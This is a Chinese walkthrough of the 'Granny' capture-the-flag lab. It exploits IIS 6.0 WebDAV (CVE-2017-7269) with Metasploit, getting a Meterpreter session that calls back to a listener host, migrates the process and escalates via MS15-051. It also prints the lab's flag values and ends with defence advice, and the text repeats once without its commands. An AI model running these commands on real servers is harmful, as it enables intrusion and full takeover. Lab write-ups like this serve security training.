[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升
字数 1205 2025-08-19 12:41:39

IIS 6.0漏洞利用与权限提升完整指南

1. 信息收集阶段

1.1 初始扫描

使用Nmap进行端口扫描和服务识别:

nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn

扫描结果分析:

  • 开放端口:TCP 80
  • 服务:Microsoft IIS httpd 6.0
  • WebDAV检测:
    • 允许的方法:OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
    • 潜在危险方法:TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT

1.2 WebDAV配置分析

关键发现:

  • 服务器类型:Microsoft-IIS/6.0
  • 公共选项:OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
  • 服务器日期:Thu, 22 Aug 2024 07:28:25 GMT

2. 漏洞利用阶段

2.1 CVE-2017-7269利用

使用Metasploit框架进行利用:

  1. 启动Metasploit:
msfconsole
  1. 选择漏洞利用模块:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
  1. 配置参数:
set RHOSTS 10.10.10.15
set LHOST 10.10.16.24
  1. 执行攻击:
run

成功后会获得Meterpreter会话。

2.2 会话管理

将Meterpreter会话放入后台:

bg

3. 权限提升阶段

3.1 本地漏洞检测

使用Metasploit的本地漏洞检测模块:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

3.2 进程迁移

为确保稳定性,将进程迁移到davcdata.exe:

migrate 2732

3.3 MS15-051权限提升

  1. 选择漏洞利用模块:
use exploit/windows/local/ms15_051_client_copy_image
  1. 配置参数:
set LHOST 10.10.16.24
set SESSION 1
  1. 执行权限提升:
run

4. 后渗透阶段

4.1 获取用户标志

User.txt: 700c5dc163014e22b3e408f8703f67d1

4.2 获取系统标志

Root.txt: aa4beed1c0584445ab463a6747bd06e9

5. 技术要点总结

  1. IIS 6.0 WebDAV漏洞(CVE-2017-7269)

    • 影响Microsoft IIS 6.0版本
    • 通过精心构造的PROPFIND请求触发缓冲区溢出
    • 允许远程代码执行
  2. MS15-051客户端复制映像漏洞

    • Windows内核模式驱动漏洞
    • 允许本地用户提升权限
    • 影响Windows Server 2003 SP2等系统
  3. 进程迁移技术

    • 将Meterpreter会话迁移到更稳定的进程
    • 本例中迁移到davcdata.exe(WebDAV组件进程)
    • 避免因IIS进程回收导致会话丢失
  4. Metasploit框架使用技巧

    • 模块链式调用
    • 会话后台管理
    • 本地漏洞自动检测

6. 防御建议

  1. 对于IIS 6.0:

    • 升级到更高版本
    • 禁用WebDAV扩展
    • 限制HTTP方法,仅保留必要方法
  2. 对于MS15-051:

    • 应用微软安全补丁KB3057191
    • 限制本地用户权限
  3. 通用防御措施:

    • 定期更新系统补丁
    • 实施最小权限原则
    • 监控异常进程行为
IIS 6.0漏洞利用与权限提升完整指南 1. 信息收集阶段 1.1 初始扫描 使用Nmap进行端口扫描和服务识别: 扫描结果分析: 开放端口:TCP 80 服务:Microsoft IIS httpd 6.0 WebDAV检测: 允许的方法:OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK 潜在危险方法:TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT 1.2 WebDAV配置分析 关键发现: 服务器类型:Microsoft-IIS/6.0 公共选项:OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 服务器日期:Thu, 22 Aug 2024 07:28:25 GMT 2. 漏洞利用阶段 2.1 CVE-2017-7269利用 使用Metasploit框架进行利用: 启动Metasploit: 选择漏洞利用模块: 配置参数: 执行攻击: 成功后会获得Meterpreter会话。 2.2 会话管理 将Meterpreter会话放入后台: 3. 权限提升阶段 3.1 本地漏洞检测 使用Metasploit的本地漏洞检测模块: 3.2 进程迁移 为确保稳定性,将进程迁移到davcdata.exe: 3.3 MS15-051权限提升 选择漏洞利用模块: 配置参数: 执行权限提升: 4. 后渗透阶段 4.1 获取用户标志 4.2 获取系统标志 5. 技术要点总结 IIS 6.0 WebDAV漏洞(CVE-2017-7269) : 影响Microsoft IIS 6.0版本 通过精心构造的PROPFIND请求触发缓冲区溢出 允许远程代码执行 MS15-051客户端复制映像漏洞 : Windows内核模式驱动漏洞 允许本地用户提升权限 影响Windows Server 2003 SP2等系统 进程迁移技术 : 将Meterpreter会话迁移到更稳定的进程 本例中迁移到davcdata.exe(WebDAV组件进程) 避免因IIS进程回收导致会话丢失 Metasploit框架使用技巧 : 模块链式调用 会话后台管理 本地漏洞自动检测 6. 防御建议 对于IIS 6.0: 升级到更高版本 禁用WebDAV扩展 限制HTTP方法,仅保留必要方法 对于MS15-051: 应用微软安全补丁KB3057191 限制本地用户权限 通用防御措施: 定期更新系统补丁 实施最小权限原则 监控异常进程行为